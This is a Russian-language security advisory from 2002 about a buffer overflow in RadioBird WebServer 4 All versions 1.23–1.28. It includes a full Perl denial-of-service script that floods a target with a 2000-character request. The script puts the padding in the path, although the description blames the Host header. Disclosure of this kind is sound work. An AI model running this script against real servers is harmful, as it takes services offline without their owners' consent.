Переполнение буфера в RadioBird Software WebServer 4 All

Дата публикации:
25.10.2002
Всего просмотров:
823
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: WebServer 4 All (http://www.freeware.lt/) – бесплатный, быстрый HTTP сервер от RadioBird Software.

Переполнение буфера в WebServer 4 All обнаружено при попытке обработать чрезмерно больше поле HTTP заголовка 'Host:' (более 2000 символов). Уязвимость позволяет выполнять произвольные команды с привилегиями процесса WebServer 4 All

уязвимость обнаружена в RadioBird Software WebServer 4 All 1.23-1.28 DoS эксплоит:

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;

print "Web Server 4 Everyone v1.28 
Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
            new(Proto=>"tcp",
            PeerAddr=>$host,
            PeerPort=>$port)
            || die "Connection failed.\n";

print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";


Ссылки: [SecurityOffice] Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability
или введите имя

CAPTCHA